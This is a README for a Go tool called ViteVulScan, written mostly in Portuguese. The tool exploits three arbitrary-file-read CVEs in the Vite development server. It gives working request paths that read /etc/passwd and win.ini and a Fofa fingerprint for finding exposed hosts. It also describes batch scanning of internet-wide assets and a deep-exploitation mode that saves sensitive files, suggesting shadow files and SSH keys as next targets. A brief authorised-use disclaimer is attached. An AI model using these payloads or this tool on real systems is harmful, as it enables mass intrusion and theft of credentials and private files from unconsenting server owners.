
针对CVE-2025-30208和CVE-2025-31125的漏洞利用
Este projeto envolve 3 vulnerabilidades: CVE-2025-30208 / CVE-2025-31125 / CVE-2025-31486, todas relacionadas a leitura arbitrária de arquivos no servidor de desenvolvimento Vite. Essas três vulnerabilidades têm ampla cobertura e são fáceis de explorar, sem restrições.
CVE-2025-30208:
Windows: /@fs/C://Windows/win.ini?import&raw??
Linux: /@fs/etc/passwd?import&raw??
CVE-2025-31125
Windows: /@fs/C://windows/win.ini?import&?inline=1.wasm?init
Linux: /@fs/etc/passwd?import&?inline=1.wasm?init
CVE-2025-31486
Windows: /@fs/x/x/x/vite-project/?/../../../../../C://windows/win.ini?import&?inline=1.wasm?init
Linux: /@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?inline=1.wasm?init
O caminho /@fs pode ser omitido.
body="/@vite/client"
Versão do Go: go 1.20 ou superior
Entre no diretório raiz do projeto
Primeiro, sincronize as dependências
go mod tidy
Em seguida, compile o projeto
go build -o ViteVulScan -ldflags="-s -w" -trimpath .
./ViteVulScan para executar o script.
Você também pode executar o projeto diretamente no diretório raiz:
go run .
O script suporta a integração com o Fofa para buscar ativos e realizar detecção em lote.
Para usar o Fofa, certifique-se de que o arquivo app.ini esteja no mesmo diretório do binário compilado e modifique o arquivo app.ini no diretório config. Preencha o campo fofakey com sua chave do Fofa e num com a quantidade aproximada de ativos que deseja verificar.
Se você tiver uma sintaxe de pesquisa no Fofa melhor para essa vulnerabilidade, pode modificar o campo fofaQuery por conta própria.
Usage of ./ViteVulScan:
http://example1.com
example2.com
127.0.0.1
-fofa e -f são especificados para detecção, os ativos vulneráveis são automaticamente salvos no diretório atual, com o formato de nome "timestamp_atual.csv".linux_sensitive_path.txt e windows_sensitive_path.txt, localizados no diretório dict. Se houver mais caminhos sensíveis, você pode adicioná-los manualmente nos dicionários correspondentes.Exemplo 1: Integração com Fofa para detecção em lote:
./ViteVulScan -fofa

Após a varredura, no diretório result, você encontrará o arquivo CSV com as URLs que foram exploradas com sucesso, nomeado com o timestamp:

Exemplo 2: Exploração aprofundada de uma URL vulnerável:
./ViteVulScan -u example.com -e

Se aparecer "Exploração bem-sucedida", verifique o diretório result. Haverá um diretório com o nome da URL escaneada. Os conteúdos dos arquivos sensíveis escaneados são salvos no formato original do arquivo, no caminho correspondente, conforme mostrado abaixo:

Tomando como exemplo o conteúdo salvo em result/localhost:5173/etc/passwd, vemos que o conteúdo completo da informação sensível foi preservado, facilitando a exploração subsequente (se for possível ler /etc/shadow ou as chaves SSH do servidor, é possível explorar ainda mais).

Esta ferramenta destina-se apenas a pesquisas de segurança e testes autorizados. Não a utilize para fins ilegais. Qualquer consequência decorrente do uso desta ferramenta para testes não autorizados é de responsabilidade do usuário.
| Parâmetro | Descrição |
|---|
| -cve | Qual vulnerabilidade CVE usar para detecção. Suporta CVE_2025_30208 / CVE_2025_31125 / CVE_2025_31486. O padrão é CVE_2025_30208. |
| -fofa | Se especificado, integra-se ao Fofa para mapear ativos e realizar detecção em lote nos alvos obtidos. |
| -u | -url | Especifica um único alvo URL para detecção. |
| -f | -filename | Especifica um nome de arquivo para detecção em lote das URLs contidas nele. |
| -e | Se especificado, realiza exploração aprofundada nos ativos que apresentarem vulnerabilidade, lendo diversos arquivos sensíveis possíveis e salvando-os localmente. (Use este recurso com cuidado; o ideal é usá-lo com detecção de um único alvo, ou seja, combinado com -u.) |